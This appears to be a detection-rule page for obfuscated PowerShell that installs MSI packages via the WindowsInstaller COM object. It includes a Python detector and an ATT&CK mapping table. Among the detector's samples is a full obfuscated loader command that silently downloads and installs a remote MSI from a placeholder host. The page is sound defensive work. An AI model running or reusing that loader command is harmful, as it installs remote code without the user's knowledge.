
Obfuscated PowerShell MSI Install via WindowsInstaller COM (7b6a7418-3afc-11f0-aff4-000d3abf478c)

Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (WindowsInstaller.Installer). The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of InstallProduct and COM object creation, particularly combined with hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
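The description above lists the runtime string tricks the rule is built around (a class name assembled with Insert, a scheme repaired from 'htps://', InstallProduct on the Installer COM object, a hidden window and suppressed UI). The following is an added Python example, not part of this page or the Sigma rule itself, showing how a detection pipeline can statically fold such Insert/Replace operations on string literals before matching, so the indicators are seen as the script would build them at runtime. The sample command lines are constructed for the example, the indicator names are this example's own, and the UILevel check is an assumption about how UI suppression is expressed (the page does not name that property).

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample command lines, shaped like the CommandLine field of a
# process-creation event. They are not real telemetry.
SAMPLE_COMMAND_LINES = [
    # obfuscated: class name built with Insert(0,'W'), scheme repaired at runtime,
    # hidden window, UI suppressed
    "powershell.exe -w hidden -c \"$c='indowsInstaller.Installer'.Insert(0,'W');"
    "$i=New-Object -ComObject $c;$i.UILevel=2;"
    "$u='htps://example.invalid/p.msi'.Replace('htps','https');$i.InstallProduct($u)\"",
    # plain administrative use of the same COM object, nothing obfuscated
    "powershell.exe -c \"$i=New-Object -ComObject WindowsInstaller.Installer;"
    "$i.InstallProduct('C:\\pkg\\app.msi')\"",
    # unrelated activity
    "powershell.exe -c \"Get-ChildItem C:\\Temp\"",
    "msiexec.exe /i C:\\installers\\app.msi /qn",
]

# 'literal'.Insert(n,'x') and 'literal'.Replace('a','b') on single-quoted strings
_INSERT = re.compile(r"'([^']*)'\.Insert\(\s*(\d+)\s*,\s*'([^']*)'\s*\)", re.IGNORECASE)
_REPLACE = re.compile(r"'([^']*)'\.Replace\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.IGNORECASE)


def _do_insert(m: "re.Match") -> str:
    s, n, ins = m.group(1), int(m.group(2)), m.group(3)
    if n > len(s):
        return m.group(0)  # PowerShell would throw here; leave the text untouched
    return "'" + s[:n] + ins + s[n:] + "'"


def _do_replace(m: "re.Match") -> str:
    s, old, new = m.group(1), m.group(2), m.group(3)
    return "'" + s.replace(old, new) + "'"


def fold_string_ops(text: str, max_rounds: int = 8) -> Tuple[str, bool]:
    """Statically evaluate Insert/Replace applied to string literals, repeating
    until nothing changes. Returns (normalized text, whether anything was folded)."""
    changed = False
    for _ in range(max_rounds):
        new = _INSERT.sub(_do_insert, text)
        new = _REPLACE.sub(_do_replace, new)
        if new == text:
            break
        text, changed = new, True
    return text, changed


# Indicators are checked against both the raw and the folded text, so a
# malformed scheme is still seen even after folding has repaired it.
_INDICATORS = {
    "windowsinstaller_com": re.compile(r"WindowsInstaller\.Installer", re.IGNORECASE),
    "installproduct": re.compile(r"\bInstallProduct\b", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE),
    "ui_suppressed": re.compile(r"\bUILevel\s*=", re.IGNORECASE),  # assumption, see lead-in
    "malformed_scheme": re.compile(r"\bhtps://", re.IGNORECASE),
}


@dataclass
class Finding:
    line_no: int
    severity: str
    indicators: List[str]
    normalized: str


def analyze(command_line: str) -> Tuple[Optional[str], List[str]]:
    """Return (severity or None, matched indicator names) for one command line."""
    normalized, folded = fold_string_ops(command_line)
    hits = [name for name, rx in _INDICATORS.items()
            if rx.search(command_line) or rx.search(normalized)]
    if folded:
        hits.append("string_ops_folded")
    # Core condition: Installer COM class plus InstallProduct, after folding.
    if "windowsinstaller_com" not in hits or "installproduct" not in hits:
        return None, hits
    # Obfuscation, hidden window, suppressed UI or a repaired scheme separate the
    # loader pattern from ordinary administrative use of the same COM object.
    noisy = {"string_ops_folded", "hidden_window", "ui_suppressed", "malformed_scheme"}
    severity = "high" if noisy & set(hits) else "low"
    return severity, hits


def scan(lines: List[str]) -> List[Finding]:
    findings = []
    for i, line in enumerate(lines, 1):
        severity, hits = analyze(line)
        if severity:
            findings.append(Finding(i, severity, hits, fold_string_ops(line)[0]))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMAND_LINES):
        print(f"line {f.line_no}: {f.severity} {f.indicators}")
```

The folding step only handles single-quoted literals with Insert and Replace; the same runtime construction can be expressed with double quotes, char arrays, -join, format strings or concatenation, so this normalization reduces evasion rather than removing it. The "low" tier exists because unobfuscated WindowsInstaller.Installer plus InstallProduct is also how administrators script installs, which is the main false-positive source for a rule of this kind.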

| Cluster A | Galaxy A | Cluster B | Galaxy B | Level |
|---|---|---|---|---|
| Obfuscated PowerShell MSI Install via WindowsInstaller COM (7b6a7418-3afc-11f0-aff4-000d3abf478c) | Sigma-Rules | Command Obfuscation - T1027.010 (d511a6f6-4a33-41d5-bc95-c343875d1377) | Attack Pattern | 1 |
| Obfuscated PowerShell MSI Install via WindowsInstaller COM (7b6a7418-3afc-11f0-aff4-000d3abf478c) | Sigma-Rules | PowerShell - T1059.001 (970a3432-3237-47ad-bcca-7d8cbb217736) | Attack Pattern | 1 |
| Obfuscated PowerShell MSI Install via WindowsInstaller COM (7b6a7418-3afc-11f0-aff4-000d3abf478c) | Sigma-Rules | Msiexec - T1218.007 (365be77f-fc0e-42ee-bac8-4faf806d9336) | Attack Pattern | 1 |
| Command Obfuscation - T1027.010 (d511a6f6-4a33-41d5-bc95-c343875d1377) | Attack Pattern | Obfuscated Files or Information - T1027 (b3d682b6-98f2-4fb0-aa3b-b4df007ca70a) | Attack Pattern | 2 |
| Command and Scripting Interpreter - T1059 (7385dfaf-6886-4229-9ecd-6fd678040830) | Attack Pattern | PowerShell - T1059.001 (970a3432-3237-47ad-bcca-7d8cbb217736) | Attack Pattern | 2 |
| System Binary Proxy Execution - T1218 (457c7820-d331-465a-915e-42f85500ccc4) | Attack Pattern | Msiexec - T1218.007 (365be77f-fc0e-42ee-bac8-4faf806d9336) | Attack Pattern | 2 |